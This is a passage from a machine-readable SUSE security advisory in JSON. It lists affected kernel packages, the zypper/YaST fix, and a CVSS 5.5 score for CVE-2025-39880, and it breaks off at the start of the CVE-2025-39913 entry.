"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39880",
"url": "https://www.suse.com/security/cve/CVE-2025-39880"
},
{
"category": "external",
"summary": "SUSE Bug 1250388 for CVE-2025-39880",
"url": "https://bugzilla.suse.com/1250388"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-39880"
},
{
"cve": "CVE-2025-39913",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39913"
}
],
"notes": [
{
"category": "general",
